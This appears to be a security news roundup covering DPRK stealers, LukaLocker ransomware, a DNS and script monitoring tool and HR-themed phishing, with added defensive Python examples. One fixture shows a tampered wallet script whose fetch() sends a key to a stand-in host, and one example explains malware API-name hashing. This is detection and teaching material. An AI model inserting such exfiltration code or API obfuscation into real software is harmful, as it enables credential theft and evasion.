CYBERSECURITY / DEFENSE / INTELLIGENCE

  • Cybersecurity researchers have discovered an updated variant of a known stealer malware that attackers affiliated with the Democratic People’s Republic of Korea (DPRK) have delivered as part of prior cyber espionage campaigns targeting job seekers. The artifact in question is an Apple macOS disk image (DMG) file named “MiroTalk.dmg” that mimics the legitimate video call service of the same name,

    Go to source

  • The Volcano Demon group has been observed spreading a new ransomware strain called LukaLocker, used in an attack on Idealease Inc., a truck leasing company.

    The malware looks for a range of security, monitoring and backup services, including antivirus products from Trend Micro, Malwarebytes, Sophos and McAfee, and stops any of those services it finds on the machine.

    In recent weeks Volcano Demon has been linked to several successful extortion attacks, focused on the industrial and logistics sectors.

    Notably, the group negotiates by phone: it calls the victim organisation’s leadership directly to intimidate them into paying.


    Behaviors Spotted in the Attack 

    The malware is written in C++ and ships as an x64 binary. LukaLocker resolves Windows APIs dynamically and obfuscates the API names it uses, so its destructive capabilities are hidden from static inspection, which hampers detection, analysis and reverse engineering.
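    The article does not say which hashing scheme LukaLocker uses for its dynamic API resolution, so the following is an added illustration of the general technique, not code from the malware or from SonicWall. It assumes the classic ROR13 string hash popularised by Metasploit shellcode: the malware stores only 32-bit constants and walks a DLL's export table at run time comparing hashes, while an analyst reverses the trick by precomputing the hash of every export name and mapping constants back to names. The export list is constructed for the example.

```python
"""Hash-based API resolution (malware side) and its reversal (analyst side).
Added example; the ROR13 scheme and the export list are assumptions."""

from typing import Dict, List, Optional

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def ror13_hash(name: str) -> int:
    """ROR13 string hash: for each byte, h = ror(h, 13) + byte (mod 2**32).

    A binary that stores only these constants never contains the readable
    API names, so plain string scanning reveals nothing about its imports."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & MASK32
    return h


# Constructed export list, standing in for what an analyst would dump from a
# DLL's export table (assumption: not an exhaustive list of real exports).
EXPORTS: List[str] = [
    "CreateFileA", "WriteFile", "ReadFile", "LoadLibraryA",
    "GetProcAddress", "OpenSCManagerA", "OpenServiceA", "ControlService",
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
    "OpenProcess", "TerminateProcess",
]


def resolve_by_hash(h: int, exports: List[str]) -> Optional[str]:
    """Malware side: walk the export names comparing hashes until one matches,
    which is how a loader stub finds an API without ever naming it."""
    for name in exports:
        if ror13_hash(name) == h:
            return name
    return None


def build_lookup(exports: List[str]) -> Dict[int, str]:
    """Analyst side: precompute hash -> name for every export so that
    constants pulled from a sample can be mapped back to readable names."""
    table: Dict[int, str] = {}
    for name in exports:
        h = ror13_hash(name)
        if h in table and table[h] != name:
            raise ValueError(f"hash collision: {name} vs {table[h]}")
        table[h] = name
    return table


def annotate_constants(constants: List[int], exports: List[str]) -> Dict[int, str]:
    """Map 32-bit constants recovered from a disassembly to API names,
    marking anything that matches no known export."""
    lookup = build_lookup(exports)
    return {c: lookup.get(c, "<unknown>") for c in constants}


if __name__ == "__main__":
    # Constructed: pretend these constants were read out of a disassembly.
    sample_constants = [ror13_hash("OpenSCManagerA"), ror13_hash("ControlService"), 0xDEADBEEF]
    for c, name in annotate_constants(sample_constants, EXPORTS).items():
        print(f"0x{c:08x} -> {name}")
```

    In practice the lookup table is generated from the exports of every DLL the sample loads, and the annotation step is run as a disassembler script; the same approach works for any string hash once the hashing routine has been identified in the sample.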

    When the malware runs it opens a command-prompt window that lists the processes it attempts to terminate.

    Once that is done, the malware encrypts files, appends “.NBA” to their names, and drops a ransom note named readme.txt on the desktop.

    “Your corporate network has been encrypted. And that’s not all – we studied and downloaded a lot of your data, many of these have confidential status”, reads the ransom note.

    Ransom Note

    The ransom note instructs victims to contact the operator through the qTox encrypted chat client. qTox is a peer-to-peer, end-to-end encrypted messenger built on the Tox protocol and designed to resist surveillance, which is exactly why extortion crews favour it.

    “Various security, monitoring and backup services are targeted. This includes antivirus software such as Malwarebytes, Sophos, McAfee and Trend Micro”, reads the SonicWall threat research report.

    “If any of these are present on the system, the service is disabled by the malware”.
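    The three behaviours the article describes (security and backup services being stopped, files renamed with a “.NBA” suffix, readme.txt dropped on a desktop) are cheap to detect from endpoint telemetry. The following is an added example, not from SonicWall or the article, of detection logic run over constructed log lines. The log format, the service names and the scoring thresholds are all assumptions; real service names differ by product and version.

```python
"""Score hosts for LukaLocker-style behaviour from simple event lines.
Added example; the log format and service names are constructed."""

import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Vendors the article names as targets (substring match on the service name;
# assumption: real service names vary).
WATCHED_VENDORS = ("trend micro", "malwarebytes", "sophos", "mcafee")
RANSOM_EXT = ".nba"
RANSOM_NOTE = "readme.txt"
RENAME_THRESHOLD = 5              # renames to .NBA inside WINDOW -> mass encryption
WINDOW = timedelta(minutes=2)

LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<event>\S+)(?P<rest>.*)$')
KV_RE = re.compile(r'(\w+)="([^"]*)"')

# Constructed sample: FS01 shows the full chain, WS07 only benign activity.
SAMPLE_LOG = [
    '2024-07-10T09:12:01 host=FS01 event=service_stop name="Sophos MCS Client"',
    '2024-07-10T09:12:02 host=FS01 event=service_stop name="Print Spooler"',
    '2024-07-10T09:12:10 host=FS01 event=file_rename old="D:\\share\\q1.xlsx" new="D:\\share\\q1.xlsx.NBA"',
    '2024-07-10T09:12:11 host=FS01 event=file_rename old="D:\\share\\q2.xlsx" new="D:\\share\\q2.xlsx.NBA"',
    '2024-07-10T09:12:12 host=FS01 event=file_rename old="D:\\share\\plan.docx" new="D:\\share\\plan.docx.NBA"',
    '2024-07-10T09:12:13 host=FS01 event=file_rename old="D:\\share\\fleet.db" new="D:\\share\\fleet.db.NBA"',
    '2024-07-10T09:12:14 host=FS01 event=file_rename old="D:\\share\\hr.pdf" new="D:\\share\\hr.pdf.NBA"',
    '2024-07-10T09:13:30 host=FS01 event=file_create path="C:\\Users\\admin\\Desktop\\readme.txt"',
    '2024-07-10T09:15:00 host=WS07 event=file_rename old="C:\\tmp\\a.txt" new="C:\\tmp\\a.bak"',
    '2024-07-10T09:15:01 host=WS07 event=service_stop name="Windows Update"',
]


def parse_line(line: str) -> Dict[str, str]:
    """Parse one event line into a dict; unparseable lines yield {}."""
    m = LINE_RE.match(line.strip())
    if not m:
        return {}
    rec = {"ts": m["ts"], "host": m["host"], "event": m["event"]}
    rec.update(KV_RE.findall(m["rest"]))
    return rec


def analyse(lines: List[str]) -> Dict[str, Dict[str, object]]:
    """Collect the three indicators per host."""
    per_host = defaultdict(lambda: {"stopped_services": [], "nba_renames": [], "note": False})
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        h = per_host[rec["host"]]
        if rec["event"] == "service_stop":
            if any(v in rec.get("name", "").lower() for v in WATCHED_VENDORS):
                h["stopped_services"].append(rec["name"])
        elif rec["event"] == "file_rename" and rec.get("new", "").lower().endswith(RANSOM_EXT):
            h["nba_renames"].append(datetime.fromisoformat(rec["ts"]))
        elif rec["event"] == "file_create":
            path = rec.get("path", "").lower().replace("\\", "/")
            if path.endswith("/desktop/" + RANSOM_NOTE):
                h["note"] = True
    return per_host


def burst(times: List[datetime]) -> bool:
    """True if RENAME_THRESHOLD renames fall inside any WINDOW-long span."""
    times = sorted(times)
    for i in range(len(times) - RENAME_THRESHOLD + 1):
        if times[i + RENAME_THRESHOLD - 1] - times[i] <= WINDOW:
            return True
    return False


def verdicts(lines: List[str]) -> Dict[str, str]:
    """Weighted verdict per host: a rename burst alone is enough to alert,
    while a stopped security service on its own is only 'suspicious'."""
    out = {}
    for host, h in analyse(lines).items():
        score = 0
        score += 2 if h["stopped_services"] else 0   # defence evasion
        score += 3 if burst(h["nba_renames"]) else 0  # mass encryption
        score += 1 if h["note"] else 0                # ransom note dropped
        out[host] = "ransomware" if score >= 3 else ("suspicious" if score else "clean")
    return out


if __name__ == "__main__":
    print(verdicts(SAMPLE_LOG))
```

    Keep the service-stop rule separate from the rename burst in a real deployment: the first fires early enough to isolate the host before encryption starts, whereas the burst rule confirms what has already happened.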

    List of security and backup services LukaLocker stops

    Volcano Demon operators typically encrypt the victim’s data before making any contact, then announce the compromise through the ransom note.

    The extortion then escalates: the attackers threaten to inform the victim’s clients and partners, to launch further attacks, and to sell employee and client data to scammers if the organisation does not comply.

    Ransomware operators are shifting tactics; a large number of new threat actors have emerged recently and are targeting enterprises of every kind.

    Businesses should tighten their controls accordingly, since attackers keep finding new ways into networks and new ways to steal data.


    The post Volcano Demon Group Attacking Organizations With LukaLocker Ransomware appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

  • Quick take:

    • Harmony is the fourth cybersecurity application Resonance developed to address the disconnect in cybersecurity practices.
    • Harmony captures continuous snapshots of the web state including DNS records and scripts.
    • It also utilises artificial intelligence to assess results and eliminate false positives, thus minimising research work for both the customer and the Resonance incident response team.

    Resonance, a full-spectrum cybersecurity firm building security solutions for Web2 and Web3 apps, has launched Harmony.

    The asset-monitoring tool is meant to make strong detective and preventive controls accessible to IT teams, organisations, startups and entrepreneurs at any technical level.

    This is Resonance’s fourth in-house cybersecurity application. It joins a platform that integrates more than 30 tools to deliver end-to-end, “full spectrum” cybersecurity.

    The launch comes just two months after Resonance raised $1.5 million in pre-seed funding as it seeks to address the root cause of cybersecurity breaches across both Web2 and Web3 including CDN Hijacking, BGP Hijacking, and DNS manipulation.

    According to a report by Web3 bug bounty platform Immunefi, most exploits faced by Web3 projects and non-Web3 institutions target traditional Web2 infrastructure; such attacks accounted for 46.5% of all hacks in 2022 by monetary value.

    Software reviews and education company G2 also estimates that every organisation faces about 7.5 DNS attacks a year, causing application outages in 82% of businesses, with 29% of those cases resulting in data theft.

    dApps depend on Web2 infrastructure: the domain name system, the routing tables (BGP) that direct web traffic, and content delivery networks. Exploits therefore go after those layers, and a weakness there can undermine a dApp even when the dApp itself is built securely.

    Harmony addresses this exposure by capturing continuous snapshots of the web state, including DNS records and served scripts, so that changes can be detected. The tool also uses AI to assess results and eliminate false positives, minimising investigation work for both the customer and the Resonance incident response team.
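    The snapshot-and-compare approach described above is straightforward to reproduce. The following is an added example, not Resonance’s code, of the core of such a monitor: each observation normalises the DNS record sets (order, case and trailing dots must not raise alerts) and reduces served scripts to hashes, and successive snapshots are diffed with a severity attached to each change. The record data, script bodies and risk ranking are constructed assumptions.

```python
"""Snapshot DNS records and script hashes, then diff successive snapshots.
Added example; sample data and the severity ranking are assumptions."""

import hashlib
from typing import Dict, List, Set, Tuple

Snapshot = Dict[str, object]

# Record types whose change most often signals a takeover rather than routine ops.
HIGH_RISK = {"NS", "MX", "A", "AAAA", "CNAME"}

# Constructed observations of a hypothetical app.example.com.
OLD_DNS = {
    "NS": {"ns1.example-dns.net.", "ns2.example-dns.net."},
    "A": {"203.0.113.10"},
    "TXT": {"v=spf1 include:_spf.example.net -all"},
}
OLD_SCRIPTS = {
    "https://app.example.com/static/wallet.js": b"window.connect=function(p){return p.request()};",
}
NEW_DNS = {
    "NS": {"NS2.example-dns.net", "ns1.example-dns.net"},   # same set, different case/order
    "A": {"198.51.100.77"},                                # changed: traffic now goes elsewhere
    "TXT": {"v=spf1 include:_spf.example.net -all"},
}
NEW_SCRIPTS = {
    "https://app.example.com/static/wallet.js":
        b"window.connect=function(p){fetch('https://x.example.org/'+p.key);return p.request()};",
}


def script_fingerprint(body: bytes) -> str:
    return hashlib.sha256(body).hexdigest()


def take_snapshot(dns: Dict[str, Set[str]], scripts: Dict[str, bytes]) -> Snapshot:
    """Normalise one observation so only real changes show up in the diff."""
    return {
        "dns": {rtype: {v.lower().rstrip(".") for v in vals} for rtype, vals in dns.items()},
        "scripts": {url: script_fingerprint(body) for url, body in scripts.items()},
    }


def diff_snapshots(old: Snapshot, new: Snapshot) -> List[Tuple[str, str, str]]:
    """Return (severity, subject, detail) findings for every change."""
    findings = []
    for rtype in sorted(set(old["dns"]) | set(new["dns"])):
        before, after = old["dns"].get(rtype, set()), new["dns"].get(rtype, set())
        if before == after:
            continue
        sev = "high" if rtype in HIGH_RISK else "medium"
        findings.append((sev, f"DNS {rtype}", f"-{sorted(before - after)} +{sorted(after - before)}"))
    for url in sorted(set(old["scripts"]) | set(new["scripts"])):
        b, a = old["scripts"].get(url), new["scripts"].get(url)
        if b == a:
            continue
        if b is None:
            findings.append(("high", f"script {url}", "new script appeared"))
        elif a is None:
            findings.append(("medium", f"script {url}", "script removed"))
        else:
            findings.append(("high", f"script {url}", f"content changed {b[:12]}.. -> {a[:12]}.."))
    return findings


def worst_severity(findings: List[Tuple[str, str, str]]) -> str:
    ranks = {"none": 0, "medium": 1, "high": 2}
    worst = "none"
    for sev, _, _ in findings:
        if ranks[sev] > ranks[worst]:
            worst = sev
    return worst


if __name__ == "__main__":
    old = take_snapshot(OLD_DNS, OLD_SCRIPTS)
    new = take_snapshot(NEW_DNS, NEW_SCRIPTS)
    for f in diff_snapshots(old, new):
        print(*f)
```

    In the constructed data the NS reorder is correctly ignored, while the A record moving to a different address and the wallet script gaining an outbound fetch both surface as high-severity findings; the script check is what catches the CDN-hijack case, where DNS stays untouched and only the served content changes.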

    “Releasing this new tool demonstrates Resonance’s dedication to a research-driven cybersecurity approach. The goal is to keep any organization’s cybersecurity strategies in tune with continuously evolving cyberattacks.

    This highly effective monitoring and prevention tool is a game changer for projects trying to avoid DNS takeovers and keep their sensitive assets from being exposed to black-hat hacking groups,” Resonance founder and CEO Charles Dray shared in a statement.

    The post Resonance Launches Harmony to Monitor and Detect Threats to Web2 and Web3 Apps appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

  • Attacks on your network are often meticulously planned operations launched by sophisticated threats. Sometimes your technical fortifications provide a formidable challenge, and the attack requires assistance from the inside to succeed. For example, in 2022, the FBI issued a warning that SIM swap attacks are growing: gain control of the phone and earn a gateway to email, bank accounts, stocks,

    Go to source

  • The financially motivated threat actor known as FIN7 has been observed using multiple pseudonyms across several underground forums to likely advertise a tool known to be used by ransomware groups like Black Basta. “AvNeutralizer (aka AuKill), a highly specialized tool developed by FIN7 to tamper with security solutions, has been marketed in the criminal underground and used by multiple

    Go to source

  • Phishing attacks are becoming increasingly sophisticated, and the latest strategy targeting employees highlights this evolution.

    This new phishing attempt impersonates a company’s Human Resources (HR) department, presenting a significant threat to corporate security.

    In this article, we’ll dissect the recent phishing tactic and provide detailed insights to help you recognize and avoid falling victim to such scams.

    The Deceptive Email: A Closer Look

    According to Cofense, the phishing email is meticulously designed to look like official communication from a company’s HR department.

    It arrives in employees’ inboxes with a subject line that immediately grabs attention: “Modified Employee Handbook For All Employees – Kindly Acknowledge.”

    This subject line creates a sense of urgency, prompting recipients to open the email and engage with its contents without hesitation.

    The email’s layout and language further enhance its perceived legitimacy.

    It opens with a formal greeting and presents a message in a structured format typical of corporate communications.

    The language used is professional, clear, and direct, mimicking the tone and style that employees would expect from an HR department.


    The body uses the formal language and directives typical of corporate communications: it opens with a polite greeting and moves straight to an instruction to review a revised employee handbook.

    The email stresses that compliance is required by a specific deadline, typically the end of the day, which manufactures urgency and pressures recipients to act.

    The Phishing Page: A Deceptive Trap

    The primary goal of this phishing email is to lure recipients into clicking the embedded hyperlink and trick them into entering their credentials on a fake login page.

    By appearing to originate from a trusted source (HR department), the email leverages authority and urgency to persuade recipients to take immediate action without questioning the authenticity of the request.

    Phishing Page

    The email contains a hyperlink with the heading “HR COMPLIANCE SECTION FOR REVISED EMPLOYEE HANDBOOK.”

    Clicking on this link takes you to a page that mimics a legitimate document hosting site. Here, you are presented with a “PROCEED” button to continue.

    Upon clicking the “PROCEED” button, you are redirected to a page that appears to be branded by Microsoft.

    This is where the phishing attack becomes more sophisticated.

    The page asks for your Microsoft username and looks very convincing.

    The threat actor’s strategy is to gain your trust by presenting a legitimate-looking website where you are prompted to log in with your company’s Microsoft credentials.

    Here’s a detailed breakdown of what happens next:

    1. Capture of Credentials: When you enter your company email address and press Next, you are redirected to what looks like your company’s Microsoft Office 365 login page.
    2. Error Message: After entering your username and, potentially, your password, you receive an error message stating, “There was an unexpected internal error. Please try again.” This message is a ruse: the form has already sent what you typed to the attacker.
    3. Redirection to Legitimate Login Page: You are then redirected to your company’s real SSO/Okta login page, and most victims never notice that the URL changed. By this point the threat actor holds the username and password from the login attempt.

    To protect yourself and your organization from such sophisticated phishing attacks, it is crucial to stay vigilant and follow these preventive measures:

    • Verify the Source: Always verify the sender’s email address and look for any inconsistencies.
    • Hover Over Links: Before clicking on any link, hover over it to see the actual URL.
    • Report Suspicious Emails: Immediately report any suspicious emails to your IT department.
    • Regular Training: Participate in regular cybersecurity training sessions to stay updated on the latest phishing tactics.
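    The “hover over links” advice above can be automated for an inbound mail gateway or a triage script. The following is an added example, not from Cofense or the article: it parses a constructed HTML message modelled on the one described, extracts every anchor, and flags links whose host is outside a trusted-domain allowlist, whose visible text names a different site than the href, or which use a raw IP or userinfo to disguise the destination. The trusted domains and the sample email are assumptions.

```python
"""Flag deceptive links in an HTML email. Added example; the trusted-domain
list and the sample message are constructed."""

import ipaddress
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

# Assumption: the organisation's own domain and its identity providers.
TRUSTED_DOMAINS = {"example.com", "login.microsoftonline.com", "example.okta.com"}

# Constructed message modelled on the HR-handbook lure.
SAMPLE_EMAIL = """<html><body>
<p>Dear employee,</p>
<p>Please review the revised handbook and acknowledge by end of day.</p>
<p><a href="https://docs-share-example.net/hr/handbook">HR COMPLIANCE SECTION FOR REVISED EMPLOYEE HANDBOOK</a></p>
<p><a href="https://example.com/hr">https://example.com/hr</a></p>
<p><a href="http://203.0.113.7/login">https://login.microsoftonline.com</a></p>
</body></html>"""


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every <a> in the message."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join(self._text).strip()))
            self._href = None


def registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels); a production check uses the Public Suffix List."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def is_trusted(host: str) -> bool:
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def check_link(href: str, text: str) -> List[str]:
    """Return the reasons a link looks deceptive (empty list means no finding)."""
    reasons: List[str] = []
    u = urlparse(href)
    host = u.hostname or ""
    if u.scheme not in ("http", "https"):
        return [f"non-web scheme {u.scheme!r}"]
    if u.username is not None:
        reasons.append("userinfo '@' in URL hides real host")
    try:
        ipaddress.ip_address(host)
        reasons.append("raw IP address as host")
    except ValueError:
        pass
    if not is_trusted(host):
        reasons.append(f"host {host} not in trusted domains")
    m = re.search(r"https?://([^/\s]+)", text)
    if m and registrable(m.group(1)) != registrable(host):
        reasons.append(f"visible text says {m.group(1)} but link goes to {host}")
    return reasons


def audit_email(html: str) -> List[Tuple[str, str, List[str]]]:
    """Run check_link over every anchor in the message."""
    p = LinkExtractor()
    p.feed(html)
    return [(href, text, check_link(href, text)) for href, text in p.links]


if __name__ == "__main__":
    for href, text, reasons in audit_email(SAMPLE_EMAIL):
        print(("FLAG " if reasons else "ok   ") + href, reasons)
```

    A link check only helps before the click. Once a password has been typed into the fake page it must be treated as compromised, so the response is a prompt reset and session revocation; phishing-resistant MFA (FIDO2 security keys or passkeys, which bind the login to the genuine origin) is what stops the captured credential from being replayed.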

    By staying informed and vigilant, employees can play a crucial role in safeguarding their organization against these evolving phishing threats.


    The post Beware! of New Phishing Tactics Mimic as HR Attacking Employees appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

  • A China-linked threat actor called APT17 has been observed targeting Italian companies and government entities using a variant of a known malware referred to as 9002 RAT. The two targeted attacks took place on June 24 and July 2, 2024, Italian cybersecurity company TG Soft said in an analysis published last week. “The first campaign on June 24, 2024 used an Office document, while the second

    Go to source

  • The infamous cybercrime group known as Scattered Spider has incorporated ransomware strains such as RansomHub and Qilin into its arsenal, Microsoft has revealed. Scattered Spider is the designation given to a threat actor that’s known for its sophisticated social engineering schemes to breach targets and establish persistence for follow-on exploitation and data theft. It also has a history of

    Go to source

  • Threat actors are actively exploiting a recently disclosed critical security flaw impacting Apache HugeGraph-Server that could lead to remote code execution attacks. Tracked as CVE-2024-27348 (CVSS score: 9.8), the vulnerability impacts all versions of the software before 1.3.0. It has been described as a remote command execution flaw in the Gremlin graph traversal language API. “Users are

    Go to source
